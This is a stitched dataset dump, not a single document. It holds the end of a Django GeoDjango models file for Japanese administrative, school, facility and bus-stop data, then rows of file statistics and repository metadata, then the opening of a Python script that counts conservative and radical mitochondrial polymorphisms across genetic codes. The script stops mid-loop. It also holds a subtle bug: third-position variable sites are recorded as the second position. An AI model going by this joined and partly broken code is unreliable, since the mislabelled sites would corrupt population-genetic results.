n03_007 = models.CharField(max_length=50, blank=True)
geom = models.PolygonField(srid=4326)
class Meta:
verbose_name = '行政区域データ'
verbose_name_plural = '行政区域データ'
def __str__(self):
return self.n03_004
class School(models.Model):
a27_001 = models.CharField(max_length=50, blank=True)
a27_002 = models.CharField(max_length=50, blank=True)
a27_003 = models.CharField(max_length=50, blank=True)
a27_004 = models.CharField(max_length=50, blank=True)
geom = models.PointField(srid=4326)
class Meta:
verbose_name = '小学校区データ'
verbose_name_plural = '小学校区データ'
def __str__(self):
return self.a27_003
class Facility(models.Model):
p02_001 = models.CharField(max_length=50, blank=True)
p02_002 = models.CharField(max_length=50, blank=True)
p02_003 = models.CharField(max_length=50, blank=True)
p02_004 = models.CharField(max_length=50, blank=True)
p02_005 = models.CharField(max_length=50, blank=True)
p02_006 = models.CharField(max_length=50, blank=True)
p02_007 = models.CharField(max_length=50, blank=True)
geom = models.PointField(srid=4326)
class Meta:
verbose_name = '公共施設データ'
verbose_name_plural = '公共施設データ'
def __str__(self):
return self.p02_004
class Busstop(models.Model):
p11_001 = models.CharField(max_length=256, blank=True)
p11_002 = models.CharField(max_length=256, blank=True)
p11_003_1 = models.CharField(max_length=256, blank=True)
p11_003_2 = models.CharField(max_length=256, blank=True)
p11_003_3 = models.CharField(max_length=256, blank=True)
p11_003_4 = models.CharField(max_length=256, blank=True)
p11_003_5 = models.CharField(max_length=256, blank=True)
p11_003_6 = models.CharField(max_length=256, blank=True)
p11_003_7 = models.CharField(max_length=256, blank=True)
p11_003_8 = models.CharField(max_length=256, blank=True)
p11_003_9 = models.CharField(max_length=256, blank=True)
p11_003_10 = models.CharField(max_length=256, blank=True)
p11_003_11 = models.CharField(max_length=256, blank=True)
p11_003_12 = models.CharField(max_length=256, blank=True)
p11_003_13 = models.CharField(max_length=256, blank=True)
p11_003_14 = models.CharField(max_length=256, blank=True)
p11_003_15 = models.CharField(max_length=256, blank=True)
p11_003_16 = models.CharField(max_length=256, blank=True)
p11_003_17 = models.CharField(max_length=256, blank=True)
p11_003_18 = models.CharField(max_length=256, blank=True)
p11_003_19 = models.CharField(max_length=256, blank=True)
p11_004_1 = models.CharField(max_length=256, blank=True)
p11_004_2 = models.CharField(max_length=256, blank=True)
p11_004_3 = models.CharField(max_length=256, blank=True)
p11_004_4 = models.CharField(max_length=256, blank=True)
p11_004_5 = models.CharField(max_length=256, blank=True)
p11_004_6 = models.CharField(max_length=256, blank=True)
p11_004_7 = models.CharField(max_length=256, blank=True)
p11_004_8 = models.CharField(max_length=256, blank=True)
p11_004_9 = models.CharField(max_length=256, blank=True)
p11_004_10 = models.CharField(max_length=256, blank=True)
p11_004_11 = models.CharField(max_length=256, blank=True)
p11_004_12 = models.CharField(max_length=256, blank=True)
p11_004_13 = models.CharField(max_length=256, blank=True)
p11_004_14 = models.CharField(max_length=256, blank=True)
p11_004_15 = models.CharField(max_length=256, blank=True)
p11_004_16 = models.CharField(max_length=256, blank=True)
p11_004_17 = models.CharField(max_length=256, blank=True)
p11_004_18 = models.CharField(max_length=256, blank=True)
p11_004_19 = models.CharField(max_length=256, blank=True)
geom = models.PointField(srid=4326)
class Meta:
verbose_name = 'バス停留所データ'
verbose_name_plural = 'バス停留所データ'
def __str__(self):
return self.p11_001
| 41.960784
| 61
| 0.73014
| 649
| 4,280
| 4.534669
| 0.103236
| 0.285423
| 0.342508
| 0.456677
| 0.896364
| 0.867142
| 0.857628
| 0.857628
| 0.653755
| 0.093102
| 0
| 0.146111
| 0.158879
| 4,280
| 101
| 62
| 42.376238
| 0.671389
| 0
| 0
| 0.129412
| 0
| 0
| 0.013551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047059
| false
| 0
| 0.011765
| 0.047059
| 0.905882
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
077f87612fddd9f1a658353eea59547f5dbdeba2
| 480,209
|
py
|
Python
|
conservativeRadicalPolymorphismsSubstitutions_v2.py
|
jsharbrough/conservativeRadicalPolymorphismsSubstitutions
|
2b8fd8bdfb15c9bd0ed6147dd69914ff89274fb3
|
[
"MIT"
] | null | null | null |
conservativeRadicalPolymorphismsSubstitutions_v2.py
|
jsharbrough/conservativeRadicalPolymorphismsSubstitutions
|
2b8fd8bdfb15c9bd0ed6147dd69914ff89274fb3
|
[
"MIT"
] | null | null | null |
conservativeRadicalPolymorphismsSubstitutions_v2.py
|
jsharbrough/conservativeRadicalPolymorphismsSubstitutions
|
2b8fd8bdfb15c9bd0ed6147dd69914ff89274fb3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
def polSub(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
asexList = []
logfile = open(fasta[0:-5] + 'log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
if '*' in seq:
sexList.append(seq)
else:
asexList.append(seq)
else:
outList.append(seq)
refSeq = seqDict[sexList[0]]
outSeq = seqDict[outList[0]]
outCodons = codonDict[outList[0]]
popInvariantSites = []
popPolymorphicSites = []
logfile.write('Total polymorphisms\n')
sys.stdout.write('Total Polymorphisms\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t2*pq\n')
i = 0
sum2PQ_S = 0
sum2PQ_N = 0
sum2PQ_C1 = 0
sum2PQ_C2 = 0
sum2PQ_C3 = 0
sum2PQ_C4 = 0
sum2PQ_C5 = 0
sum2PQ_C6 = 0
sum2PQ_C7 = 0
sum2PQ_R1 = 0
sum2PQ_R2 = 0
sum2PQ_R3 = 0
sum2PQ_R4 = 0
sum2PQ_R5 = 0
sum2PQ_R6 = 0
sum2PQ_R7 = 0
sum2PQ_meanC = 0
sum2PQ_meanR = 0
synS = 0
nsynS = 0
con1S = 0
con2S = 0
con3S = 0
con4S = 0
con5S = 0
con6S = 0
con7S = 0
meanConS = 0
rad1S = 0
rad2S = 0
rad3S = 0
rad4S = 0
rad5S = 0
rad6S = 0
rad7S = 0
meanRadS = 0
N = len(popList)
sexN = len(sexList)
asexN = len(asexList)
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in popList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) < 2:
popInvariantSites.append(i*3)
popInvariantSites.append((i*3) + 1)
popInvariantSites.append((i*3) + 2)
else:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) == 1:
popInvariantSites.append(i*3)
else:
popPolymorphicSites.append(i*3)
variableSites.append(i*3)
if len(site2) == 1:
popInvariantSites.append((i*3) + 1)
else:
popPolymorphicSites.append((i*3) + 1)
variableSites.append((i*3) + 1)
if len(site3) == 1:
popInvariantSites.append((i*3) + 2)
else:
popPolymorphicSites.append((i*3) + 2)
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = currFreqDict[codon]
twoPQ *= freq
if len(aaList) == 1:
synS += 1
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
nsynS += 1
sum2PQ_N += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ
else:
rad1S += 1
sum2PQ_R1 += twoPQ
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ
else:
rad2S += 1
sum2PQ_R2 += twoPQ
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ
else:
rad3S += 1
sum2PQ_R3 += twoPQ
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ
else:
rad4S += 1
sum2PQ_R4 += twoPQ
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ
else:
rad5S += 1
sum2PQ_R5 += twoPQ
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ
else:
rad6S += 1
sum2PQ_R6 += twoPQ
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ
else:
rad7S += 1
sum2PQ_R7 += twoPQ
